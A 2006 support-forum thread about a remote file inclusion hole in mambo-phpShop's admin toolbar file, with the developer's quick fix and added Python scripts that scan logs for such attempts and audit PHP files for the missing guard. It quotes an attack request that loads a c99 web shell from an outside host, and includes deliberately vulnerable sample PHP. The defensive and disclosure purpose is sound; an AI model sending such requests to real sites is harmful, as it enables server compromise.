Topic: Are there known security risks in mamboPHPShop?
adtp (Newbie, 8 posts)
« on: August 18, 2006, 11:12:45 AM »

Hello,
does anybody know if there are any security risks in the old mamboPHPShop? I ask because today I found some search strings in the log files like:
"/com_phpshop/" language:de
or
allinurl: com_phpshop

In the last few hours it has been getting more and more.

Thanks
Torsten

current project SEDARO Möbel - language: german [Sitzwürfel - Sitzhocker & Wohnaccessoires]
adtp (Newbie, 8 posts)
« Reply #1 on: August 19, 2006, 12:17:14 PM »

Hello,
they are trying to manipulate via toolbar.phpshop.html.php; an extract from the log file:

/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://deadbone.by.ru/c99.txt?cmd=id

My admin area is protected by htaccess, so nothing happens. Perhaps someone could say more about whether it is serious.

Torsten
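The log line in the reply above is the classic remote file inclusion shape: a direct request to an admin include file, with the Mambo path global mosConfig_absolute_path set to an attacker-hosted script (a c99 web shell) and the shell's own "?cmd=id" riding inside the parameter value. The script below is an added example, not code from the thread or from the mambo-phpShop project: it runs that detection over a handful of constructed Apache combined-log lines (the first reproduces the quoted request; the other client addresses are RFC 5737 documentation ranges) and separates attempts that were blocked, as on Torsten's htaccess-protected admin area, from ones the server answered with 200.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines for this demo (not taken from a real
# log). The first mirrors the request adtp quoted, with the same attacker
# host and payload; the client addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Aug/2006:03:14:07 +0200] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://deadbone.by.ru/c99.txt?cmd=id HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.9 - - [19/Aug/2006:03:15:20 +0200] "GET /index.php?option=com_phpshop&page=shop.browse HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Aug/2006:03:16:02 +0200] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http%3A%2F%2F203.0.113.7%2Fshell.txt%3F HTTP/1.1" 403 - "-" "curl/7.15"
192.0.2.4 - - [19/Aug/2006:03:17:45 +0200] "GET /administrator/index2.php?option=com_phpshop HTTP/1.1" 200 4411 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
REMOTE_URL_RE = re.compile(r"^(?:https?|ftps?)://", re.I)
# Mambo 4.5 configuration globals that old components used as the root of
# their include paths; with register_globals on, a request can set them.
MAMBO_GLOBALS = {"mosConfig_absolute_path", "mosConfig_live_site"}


def find_rfi_attempts(log_text: str) -> list[dict]:
    """Flag requests where any query parameter carries a remote URL.

    That is the remote file inclusion shape from the thread: the include root
    is replaced with http://attacker/shell.txt so PHP fetches and runs it.
    """
    hits = []
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw)
        if not m:
            continue  # not a combined-log line; skip rather than guess
        target = urlsplit(m["target"])
        # urlsplit cuts at the first '?', so the payload's own '?cmd=id' stays
        # inside the parameter value instead of being read as a second query.
        params = parse_qs(target.query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:  # parse_qs has already percent-decoded
                if not REMOTE_URL_RE.match(value):
                    continue
                hits.append({
                    "ip": m["ip"],
                    "time": m["ts"],
                    "path": target.path,
                    "param": name,
                    "include_url": value,
                    "status": m["status"],
                    "known_global": name in MAMBO_GLOBALS,
                    # A 200 on a direct request to a file under /administrator/
                    # means neither htaccess nor a _VALID_MOS guard stopped it;
                    # the 403 is what an htaccess-protected admin area returns.
                    "served": m["status"] == "200",
                })
    return hits


def attackers_that_got_through(hits: list[dict]) -> set[str]:
    """Source addresses whose RFI request was answered with 200: triage these first."""
    return {h["ip"] for h in hits if h["served"]}


if __name__ == "__main__":
    for h in find_rfi_attempts(SAMPLE_LOG):
        flag = "SERVED" if h["served"] else "blocked"
        print(f"{h['time']} {h['ip']} {flag} {h['path']} {h['param']}={h['include_url']}")
```

The check is deliberately keyed on the parameter value (a URL with a scheme) rather than only on mosConfig_absolute_path, so it also catches the same attack against other globals; the known_global field tells you which hits use the Mambo names the thread is about. A "served" hit against a file under /administrator/ is the one that warrants a look at the file system, since the included shell runs with the web server's privileges.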
scotoc (Newbie, 3 posts)
« Reply #2 on: August 19, 2006, 19:59:48 PM »

Quote from: adtp on August 18, 2006, 11:12:45 AM
    Hello,
    does anybody know if there are any security risks in the old mamboPHPShop? I ask because today I found some search strings in the log files like:
    "/com_phpshop/" language:de
    or
    allinurl: com_phpshop

    In the last few hours it has been getting more and more.

    Thanks
    Torsten


There are definitely problems. Last night our server got whacked badly. They gained entry via the phpshop toolbar on a customer's site. They replaced over 175 website indexes. It appears they are running v1.1. The site is offline until I can investigate further and secure it.

On a related note, how do I get them from 1.1 to whatever the latest is?
Soeren (Administrator, Hero Member, 3106 posts, VirtueMart Lead Developer)
« Reply #3 on: August 21, 2006, 04:01:14 AM »

Hello,

the security hole can be confirmed for all versions of mambo-phpShop prior to 1.2 stable.

Versions affected: mambo-phpShop 1.1 - 1.2 RC2.
Versions NOT affected: mambo-phpShop 1.2 stable (all patch levels).

You are only at risk when register_globals is turned on!

QUICK FIX
Find the file /administrator/components/com_phpshop/toolbar.phpshop.html.php and add

Code:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

right after the opening <?php tag, so it looks like this:

Code:
<?php
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
/** ....
*/

I will send out a newsletter to notify everyone about the security risk.

ciao, Soeren

The future of eCommerce: VirtueMart & Joomla!
http://virtuemart.net
--
The VirtueMart project needs your help! To be able to continue this project please contribute your skills. Read more.
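The quick fix works because _VALID_MOS is only defined when the file is loaded through Mambo's own index.php; a direct request to the file never has it, so the die() fires before the include that trusts $mosConfig_absolute_path runs. Soeren's point that register_globals is the precondition is what turns the bare include into a remote file inclusion. The audit script below is an added example, not code from the thread or from the mambo-phpShop or VirtueMart projects: it walks a tree of PHP files, reports any file whose first variable-driven include or require comes before a _VALID_MOS guard, and reads a php.ini or .htaccess-style register_globals setting. The two PHP files it creates are constructed stand-ins for the file before and after the fix, not the real toolbar.phpshop.html.php, and the temporary directory layout is an assumption for the demo.

```python
import re
import tempfile
from pathlib import Path

# Constructed stand-ins for an admin include file before and after the quick
# fix above. They are not the real toolbar.phpshop.html.php.
VULNERABLE_SRC = """<?php
/** admin toolbar, pre-1.2 style (constructed) */
require_once( $mosConfig_absolute_path . '/administrator/includes/pageNavigation.php' );
echo 'toolbar';
"""

PATCHED_SRC = """<?php
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
/** admin toolbar after the fix (constructed) */
require_once( $mosConfig_absolute_path . '/administrator/includes/pageNavigation.php' );
echo 'toolbar';
"""

GUARD_RE = re.compile(r"""defined\s*\(\s*['"]_VALID_MOS['"]\s*\)""")
# include/require whose path expression contains a PHP variable. With
# register_globals on, any such variable can be seeded from the query string,
# so the guard has to run before the first of these.
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*[^;\n]*\$\w+")


def check_php_source(src: str) -> dict:
    """Locate the _VALID_MOS guard and the first variable-driven include.

    vulnerable is True when such an include exists and no guard precedes it,
    i.e. a direct request with register_globals on can choose the include
    path, which is the mambo-phpShop hole discussed in this thread.
    """
    guard = GUARD_RE.search(src)
    inc = INCLUDE_RE.search(src)
    guard_line = src.count("\n", 0, guard.start()) + 1 if guard else None
    inc_line = src.count("\n", 0, inc.start()) + 1 if inc else None
    vulnerable = inc is not None and (guard is None or guard.start() > inc.start())
    return {"guard_line": guard_line, "include_line": inc_line, "vulnerable": vulnerable}


def audit_tree(root: Path) -> list:
    """Run check_php_source over every .php file under root; return only findings."""
    findings = []
    for path in sorted(root.rglob("*.php")):
        result = check_php_source(path.read_text(encoding="utf-8", errors="replace"))
        if result["vulnerable"]:
            findings.append((path.relative_to(root).as_posix(), result))
    return findings


def register_globals_enabled(ini_text: str) -> bool:
    """Read a php.ini ("register_globals = On") or .htaccess ("php_flag
    register_globals on") setting; without it the include is not reachable
    from a request, which is Soeren's precondition above."""
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()  # drop php.ini comments
        m = re.match(r"(?:php_flag\s+|php_value\s+)?register_globals\s*=?\s*(\S+)", line, re.I)
        if m:
            return m.group(1).strip('"').lower() in ("on", "1", "true", "yes")
    return False  # PHP's default since 4.2 is Off


def demo() -> list:
    """Write the two constructed files into a temporary Mambo-like tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        comp = Path(tmp) / "administrator" / "components" / "com_phpshop"
        comp.mkdir(parents=True)
        (comp / "toolbar.phpshop.html.php").write_text(VULNERABLE_SRC, encoding="utf-8")
        (comp / "toolbar.phpshop.php").write_text(PATCHED_SRC, encoding="utf-8")
        return audit_tree(Path(tmp))


if __name__ == "__main__":
    for rel, res in demo():
        print(f"{rel}: variable include at line {res['include_line']}, "
              f"_VALID_MOS guard at line {res['guard_line']}")
```

Run against a real install, point audit_tree at the site root and register_globals_enabled at the php.ini or .htaccess in force; a finding only matters when the second returns True, but adding the guard is the right fix either way, since it costs nothing and does not depend on the server configuration staying safe.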
adtp (Newbie, 8 posts)
« Reply #4 on: August 21, 2006, 10:14:35 AM »

thank you

John (Newbie, 9 posts)
« Reply #5 on: August 21, 2006, 10:27:08 AM »

Can you tell me if you can upgrade from phpshop 1.1 to 1.2?